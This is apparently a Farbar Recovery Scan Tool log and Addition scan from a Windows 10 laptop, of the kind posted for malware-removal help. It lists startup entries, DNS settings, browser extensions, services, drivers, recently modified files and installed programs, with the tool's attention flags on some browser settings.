ShellIconOverlayIdentifiers: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers-x32: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk [2015-12-11]
ShortcutTarget: Event Reminder.lnk -> C:\Program Files (x86)\Broderbund\PrintMaster\pmremind.exe (Broderbund Properties LLC)
Startup: C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutorunsDisabled [2016-02-02] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 127.0.0.1 localhost
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{21464931-263a-4a60-930e-a79b690b399f}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{31ea90e4-35d4-4540-a94c-eab28ac7c7e0}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{3973625b-d550-4482-8626-055c851fa7f8}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{825E0274-4ABB-4A35-83B7-62488622A3B1}: [NameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{ed4e3568-60c7-4154-bc8c-83374c0e6f1c}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655671564010&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655672036951&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131312655672053665&GUID=F34706C8-BC86-441C-8A8D-ECA6761F344B
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-01-19] (Atheros Commnucations)
Toolbar: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)

FireFox:
========
FF ProfilePath: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default [2017-02-11]
FF NewTab: Mozilla\Firefox\Profiles\w1n6vmjf.default -> about:newtab
FF Extension: (No Name) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\videoresumer@jetpack [not found]
FF Extension: (No Name) - C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1} [not found]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\aolsearch.xml [2015-12-15]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2011-11-07] (Adobe Systems, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-10] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-10] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2783097096-289569773-1546617986-1001: bluejeans.com/bjninstallplugin -> C:\Users\Randy\AppData\Roaming\Blue Jeans\bjnplugin\2.115.57.5\npbjninstallplugin_2.115.57.5.dll [2015-10-15] (Blue Jeans)
FF Plugin HKU\S-1-5-21-2783097096-289569773-1546617986-1001: bluejeans.com/bjnplugin -> C:\Users\Randy\AppData\Roaming\Blue Jeans\bjnplugin\2.115.57.5\npbjnplugin_2.115.57.5.dll [2015-10-15] (Blue Jeans)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-12-17] (Adobe Systems Inc.)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-12-11] <==== ATTENTION (Points to *.cfg file)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default [2017-02-11]
CHR Extension: (Google Docs) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-30]
CHR Extension: (Google Drive) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-30]
CHR Extension: (YouTube) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-30]
CHR Extension: (Google Search) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-30]
CHR Extension: (Google Docs Offline) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-08-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-11]
CHR Extension: (Gmail) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-30]
CHR Extension: (Chrome Media Router) - C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-11]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [361984 2012-02-10] (Advanced Micro Devices, Inc.) [File not signed]
R2 BackupService; C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe [247808 2016-05-06] (SpeedyPC Software) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-04-27] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-29] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2016-06-30] (Microsoft Corporation)
R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [158880 2012-01-19] (Atheros) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [102912 2015-05-28] (Advanced Micro Devices)
S3 lehidmini; C:\WINDOWS\system32\drivers\leath_hid.sys [36128 2012-01-19] (Atheros) [File not signed]
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [136408 2015-12-11] (Malwarebytes Corporation)
R3 RSP2STOR; C:\WINDOWS\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2015-10-29] (Realtek )
S3 ssmirrdr; C:\WINDOWS\system32\DRIVERS\ssmirrdr.sys [10112 2015-06-29] (support.com, Inc)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44568 2015-10-29] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [293216 2015-10-29] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [118112 2015-10-29] (Microsoft Corporation)
R3 WirelessKeyboardFilter; C:\WINDOWS\System32\drivers\WirelessKeyboardFilter.sys [49896 2016-07-22] (Microsoft Corporation)
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-02-11 18:24 - 2017-02-11 18:24 - 00003986 _____ C:\Users\Randy\Desktop\JRT.txt
2017-02-11 15:05 - 2017-02-11 15:05 - 00003272 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-02-10 21:46 - 2017-02-10 21:46 - 00001291 _____ C:\Users\Randy\Desktop\Google Chrome.lnk
2017-02-10 21:27 - 2017-02-11 20:20 - 00000000 ____D C:\Users\Randy\Desktop\Virus
2017-02-10 21:27 - 2017-02-10 21:27 - 00000000 ____D C:\Users\Randy\Desktop\New folder

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-02-11 20:20 - 2016-08-08 22:41 - 00000512 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job
2017-02-11 20:20 - 2014-09-12 16:11 - 00000000 ____D C:\FRST
2017-02-11 19:36 - 2015-10-29 23:24 - 00000000 ___HD C:\Program Files\WindowsApps
2017-02-11 19:36 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-02-11 19:31 - 2012-03-01 11:01 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-11 19:28 - 2016-02-02 10:45 - 00000000 ____D C:\Users\Randy\AppData\Local\Packages
2017-02-11 19:04 - 2016-08-08 00:10 - 00000000 ____D C:\$Windows.~BT
2017-02-11 18:43 - 2016-02-02 10:03 - 00000000 ___DC C:\WINDOWS\Panther
2017-02-11 18:43 - 2013-07-23 22:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-02-11 18:34 - 2015-10-29 23:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-02-11 18:34 - 2013-02-01 21:26 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-02-11 18:21 - 2016-02-17 15:50 - 00000000 ____D C:\Program Files\COMODO
2017-02-11 18:15 - 2016-08-08 22:41 - 00000496 _____ C:\WINDOWS\Tasks\SpeedyBackup Startup.job
2017-02-11 18:13 - 2016-08-08 22:41 - 00000530 _____ C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job
2017-02-11 18:13 - 2016-08-08 22:41 - 00000522 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job
2017-02-11 18:13 - 2016-02-02 10:38 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-02-11 18:12 - 2016-02-02 10:30 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-02-11 18:12 - 2015-10-29 22:28 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2017-02-11 18:11 - 2014-09-12 16:43 - 00000000 ____D C:\AdwCleaner
2017-02-11 18:10 - 2013-03-20 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-02-11 18:08 - 2014-02-09 06:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-02-11 18:08 - 2013-03-20 21:54 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2017-02-11 18:08 - 2013-03-20 21:54 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2017-02-11 18:07 - 2015-12-04 10:59 - 00000000 ____D C:\Program Files (x86)\iolo
2017-02-11 18:03 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\system32\SecureBootUpdates
2017-02-11 15:13 - 2016-02-02 10:18 - 00000000 ____D C:\Users\Randy
2017-02-11 15:08 - 2016-02-02 10:17 - 01010686 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-02-11 15:08 - 2015-10-29 23:21 - 00000000 ____D C:\WINDOWS\INF
2017-02-11 15:05 - 2016-02-02 10:56 - 00002399 _____ C:\Users\Randy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-11 15:05 - 2016-02-02 10:56 - 00000000 ___RD C:\Users\Randy\OneDrive
2017-02-11 15:03 - 2012-11-20 13:45 - 00000000 ____D C:\Users\Randy\AppData\Roaming\Skype
2017-02-11 14:58 - 2016-02-15 14:41 - 00000000 ____D C:\Users\Randy\AppData\Local\{3A700C2C-1ED8-6094-7340-457C5728B9E4}
2017-02-10 21:59 - 2013-01-03 20:57 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-02-10 21:36 - 2013-01-03 20:56 - 00003416 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-02-10 21:36 - 2013-01-03 20:56 - 00003292 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-02-10 21:24 - 2013-02-24 22:05 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-02-10 21:19 - 2015-10-29 23:24 - 00000000 ____D C:\WINDOWS\system32\NDF

==================== Files in the root of some directories =======

2016-08-08 20:54 - 2017-02-10 21:18 - 0000115 _____ () C:\Users\Randy\AppData\Roaming\LogFile.txt
2016-06-19 06:26 - 2016-06-19 06:26 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb0.dat
2016-06-10 06:41 - 2016-06-10 06:41 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb203.dat
2016-02-17 11:41 - 2016-08-05 17:41 - 0000228 _____ () C:\Users\Randy\AppData\Roaming\WB.CFG
2015-11-15 15:05 - 2015-11-15 15:05 - 0002560 _____ () C:\Users\Randy\AppData\Local\uninstall.exe
2015-01-27 15:51 - 2015-01-27 15:51 - 0000057 _____ () C:\ProgramData\Ament.ini

Some files in TEMP:
====================
2016-08-08 22:40 - 2016-08-08 22:41 - 8464000 _____ (SpeedyPC Software Inc.) C:\Users\Randy\AppData\Local\Temp\OMD5938.tmp.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-02-10 22:01

==================== End of FRST.txt ============================
 
Addition:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-02-2017
Ran by Randy (11-02-2017 20:21:27)
Running from C:\Users\Randy\Desktop\Virus
Windows 10 Home Version 1511 (X64) (2016-02-02 18:44:56)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2783097096-289569773-1546617986-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2783097096-289569773-1546617986-503 - Limited - Disabled)
Guest (S-1-5-21-2783097096-289569773-1546617986-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2783097096-289569773-1546617986-1011 - Limited - Enabled)
Randy (S-1-5-21-2783097096-289569773-1546617986-1001 - Administrator - Enabled) => C:\Users\Randy

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Reader XI (11.0.19) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.19 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.3.633 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{9D1400EC-5703-3983-53B7-AEFB8BFD1CFA}) (Version: 3.0.864.0 - Advanced Micro Devices, Inc.)
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version: - AOL Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.120 - Atheros)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
Blio (HKLM-x32\...\{74A8E1BE-D438-4C35-ABFF-3A1EAF17526E}) (Version: 2.2.8530 - K-NFB Reading Technology, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DHTML Editing Component (HKLM-x32\...\{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0001 - Microsoft Corporation)
Driver Detective (HKLM-x32\...\DriversHQ.DriverDetective.Client) (Version: 10.1.2.44 - PC Drivers HeadQuarters LP)
Ear Training 101 - Full Version (HKLM-x32\...\Ear Training 101 - Full Version4.0) (Version: - )
Ear Training 101 & Rhythmic Patterns (HKLM-x32\...\Ear Training 101 & Rhythmic Patternsv. 4.0) (Version: v. 4.0 - Music Unlimited Inc.)
ESU for Microsoft Windows 7 SP1 (HKLM-x32\...\{768A6276-5822-489C-8A2B-67190F745655}) (Version: 4.1.2 - Hewlett-Packard)
Evernote v. 4.5.2 (HKLM-x32\...\{8CE152BA-1D16-11E1-867D-984BE15F174E}) (Version: 4.5.2.5904 - Evernote Corp.)
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.1.2.0 (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
HP 3D DriveGuard (HKLM\...\{B1A6285F-C31A-4482-8EA0-9445E4C1DCEA}) (Version: 4.1.10.1 - Hewlett-Packard Company)
HP Application Assistant (HKLM\...\{6032497A-4479-462B-ADB8-A0A372BB9A23}) (Version: 1.0.409.3882 - Hewlett-Packard)
HP Connection Manager (HKLM-x32\...\{B65FCAA5-F3A6-4B3F-ABEE-CBC2B085796B}) (Version: 4.1.25.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company)
HP Deskjet 1510 series Basic Device Software (HKLM\...\{D17E60E8-478A-4D4A-8147-21D481B5CA55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
HP Deskjet 1510 series Help (HKLM-x32\...\{2E25FCEB-EFCB-4696-AA01-D3CBAC721831}) (Version: 30.0.0 - Hewlett Packard)
HP Documentation (HKLM-x32\...\{16652164-D80F-4EE6-90C6-2E8D5D06092A}) (Version: 1.1.0.0 - Hewlett-Packard)
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP OfficeJet 3830 series Basic Device Software (HKLM\...\{644380A4-11D0-48CB-AAB8-CCB6BD072784}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP On Screen Display (HKLM-x32\...\{ED1BD69A-07E3-418C-91F1-D856582581BF}) (Version: 1.3.5 - Hewlett-Packard Company)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Quick Launch (HKLM-x32\...\{C61FCEC2-3ED4-496E-B4B4-1CED423824B9}) (Version: 2.6.2 - Hewlett-Packard Company)
HP Security Assistant (HKLM\...\{F9DF0B5D-554B-45D2-8698-7C467FAF4BCA}) (Version: 2.0.2 - Hewlett-Packard Company)
HP Setup (HKLM-x32\...\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15109.3899 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.14901.3869 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{6DE80866-EF92-47C1-80F5-1EA83B7A0AA2}) (Version: 4.5.4.1 - Hewlett-Packard Company)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6381.0 - IDT)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Access database engine 2007 (English) (HKLM-x32\...\{90120000-00D1-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
